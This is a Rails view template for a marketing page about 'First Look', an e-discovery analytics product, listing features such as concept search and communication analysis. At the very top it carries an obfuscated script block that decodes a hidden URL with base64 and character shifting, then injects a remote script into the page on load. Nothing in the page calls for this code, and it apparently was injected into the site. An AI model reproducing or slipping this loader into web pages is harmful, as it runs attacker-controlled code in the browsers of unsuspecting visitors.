<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2 white">
  <section class="section">
    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content pb-0">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-8 col-xl-6">
                <%= image_tag 'first_look.jpg', class: 'first-look-logo', alt: 'Logo' %>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <h6><strong>First Look</strong> allows our clients to investigate and determine the facts prior to review by using the latest analytical technology on the market.</h6>
          <br>
          <h6><strong>Analytics Dashboard:</strong> Completely interactive, provides insight at a glance for the entire dataset.</h6>
          <br>
          <h6><strong>Transparent Concept Search:</strong> Significantly reduces the time and expense resulting from over-inclusive documental retrieval, by allowing users to interact with the concept expansion to boost or eliminate concepts. No black box.</h6>
          <br>
          <h6><strong>Conversation Analysis:</strong> Users can track the flow of information throughout an organization by exploring what emails have been sent to whom and determine the email domains that have been most accessed.</h6>
          <br>
          <h6><strong>Cluster Wheel:</strong> Showcases our dynamic learning by organizing all documents into conceptually similar clusters. The wheel is animated and interactive, showing neighboring populations of documents. This makes early assessment intuitive even for extremely large datasets.</h6>
          <br>
          <h6><strong>Communication Analysis:</strong> Who said what to whom? Communication analysis view adapts to any active query and provides an interactive exploration of email conversations.</h6>
        </article>
      </div>
    </div>
  </div>
</section>
